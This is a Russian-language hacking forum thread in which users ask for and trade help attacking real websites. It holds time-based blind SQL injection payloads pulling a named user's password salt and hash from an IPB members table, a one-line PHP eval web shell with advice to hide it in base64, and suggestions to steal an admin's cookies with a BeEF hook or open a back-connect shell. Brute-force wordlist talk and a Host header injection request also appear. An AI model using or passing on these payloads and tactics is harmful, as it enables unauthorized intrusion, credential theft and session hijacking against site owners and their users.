Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    251
    Likes Received:
    120
    Reputations:
    1
    Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят
     
  2. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Делай дамп БД без вывода таблиц
     
  3. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    251
    Likes Received:
    120
    Reputations:
    1
    Выдрал талицу, вектор вот такой(оказалось вот такой префикс ibf_)
    Code:
    and (select sleep(5) from dual where (select members_pass_salt from ibf_members where name like '%Wilda%' limit 0,1) like '______')-- -' True
    
    and (select sleep(5) from dual where (select members_pass_hash from ibf_members where name like '%Wilda%' limit 0,1) like '________________________________')-- -' True
    
    Из чего следует что соль будет 5 символов, а хєш пароля 32

    Вопрос,я понял что теперь остается брутить символы, только как узнать правильную их последовательность?
     
  4. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
    PS. Одна из идеи было переписать .htaccess
     
    #2204 Octavian, 27 Dec 2017
    Last edited: 27 Dec 2017
  5. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    251
    Likes Received:
    120
    Reputations:
    1
    записать в файл <? eval($_GET[cmd]);?> Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь
     
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Ты внимательно читаи знаеш что твкое IP?
     
  7. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    251
    Likes Received:
    120
    Reputations:
    1
    Значит ищи раскрытие путей, и заливай мини шел через php файл
     
  8. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    84
    Likes Received:
    10
    Reputations:
    0
    Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.
     
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    _
     
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Ты внимательно читаи знаеш что твкое IP?+(проверил отправив svg с js-ом) я отправив js получял уже куки и там по кукам видно что ораничения по IP )
     
    #2210 Octavian, 28 Dec 2017
    Last edited: 28 Dec 2017
  11. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    504
    Likes Received:
    903
    Reputations:
    317
    Бекконнект как вариант, далее по обстоятельствам.
     
    Octavian, zifus and t0ma5 like this.
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Где я могу наить отдельно все комбинацыии из для Bruteforce
    Code:
    4 цыфр
    5 цыфр
    6 цыфр
    7 цыфр
    8 цыфр
    9 цыфр
    10 цыфр
     
  13. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,117
    Likes Received:
    761
    Reputations:
    200
    сгенерировать самому через http://unifiedlm.com/Download или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб
     
    _________________________
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    + вопрос как мог выполнется запрос если он меняет HOST ?
    Code:
    https://hackerone.com/reports/226659
     
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,026
    Likes Received:
    1,409
    Reputations:
    53
    Ну ты прочитай
     
  16. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Немогу некак понять Host Header Atack что я не совал в Host: ничего не меняется в [SERVER_NAME] и [HTTP_HOST] инструкцию брал
    Code:
    https://habrahabr.ru/post/166855/
    [​IMG]
     
  17. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,026
    Likes Received:
    1,409
    Reputations:
    53
    Я просто не понимаю, какой результат ты ожидаешь
     
    Alexandr17 likes this.
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото
    С https://habrahabr.ru/post/166855/
    Code:
    Оправляем
    GET http://site.dev/phpinfo.php HTTP/1.1
    Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
    Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
    Cache-Control:max-age=0
    Connection:keep-alive
    Host:~%#$^&*()<>?@\!."'{}[]=+|
    Referer:http://site.dev/index.htm
    User-Agent:TelnetTest
    
    И смотрим:
    _SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
    _SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|
     
    #2218 Octavian, 30 Dec 2017
    Last edited: 30 Dec 2017
  19. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,117
    Likes Received:
    761
    Reputations:
    200
    https://vlevit.org/ru/blog/tech/host-spoofing-prevention
    http://rus-linux.net/MyLDP/server/securing-apache-part-5-http-message-architecture.html
    http://nginx.org/en/docs/http/request_processing.html
     
    _________________________
  20. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...
     
Loading...